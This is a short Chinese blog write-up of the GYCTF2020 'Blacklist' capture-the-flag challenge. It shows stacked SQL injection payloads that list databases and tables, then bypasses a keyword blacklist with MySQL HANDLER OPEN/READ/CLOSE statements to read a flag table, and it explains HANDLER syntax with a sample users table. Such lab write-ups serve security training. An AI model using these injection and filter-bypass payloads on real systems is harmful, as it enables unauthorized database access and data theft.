• [GYCTF2020]Blacklist

    [GYCTF2020]Blacklist

    payload:1'

    payload:1';show databases;

    payload:1';show tables;

    payload: 1';select * from FlagHere;

    这里过滤了很多敏感字符

    payload: 1';

    HANDLER FlagHere OPEN;

    HANDLER FlagHere READ FIRST;

    HANDLER FlagHere CLOSE;

     

    处理程序语句(HANDLER Statement)

    HANDLER tbl_name OPEN [ [AS] alias]

     

    HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)

    [ WHERE where_condition ] [LIMIT ... ]

    HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }

    [ WHERE where_condition ] [LIMIT ... ]

    HANDLER tbl_name READ { FIRST | NEXT }

    [ WHERE where_condition ] [LIMIT ... ]

    该语句提供对表存储引擎接口的直接访问。它可用于表

    该语句将打开一个表,使其可使用后续语句进行访问。此表对象不由其他会话共享,并且在会话调用或会话终止之前不会关闭。

    HANDLER ... OPENHANDLER ... READHANDLER ... CLOSE

    HANDLER tbl_name CLOSE

    例:

    mysql> show tables;

    +----------------+

    | Tables_in_test |

    +----------------+

    | users |

    | word1 |

    +----------------+

    2 rows in set (0.00 sec)

     

    mysql> HANDLER users OPEN;

    Query OK, 0 rows affected (0.39 sec)

     

    mysql> HANDLER users READ FIRST;

    +----+----------+----------+

    | id | username | password |

    +----+----------+----------+

    | 1 | Bob | 123456 |

    +----+----------+----------+

    1 row in set (0.00 sec)

     

    mysql> HANDLER users CLOSE;

    Query OK, 0 rows affected (0.00 sec)
  • 相关阅读:
    CSS3——复杂选择器
    单元测试覆盖率设置
    你必须了解的「架构」小历史
    js正则表达式:学习网址和部分正则验证
    转: js实现全角半角检测的方法
    Linux and the Unix Philosophy(1)
    HTML DOM 对象
    理解css中的 content:" " 是什么意思
    JS
    js
  • 原文地址:https://www.cnblogs.com/JKding233/p/13466254.html
Copyright © 2020-2023  润新知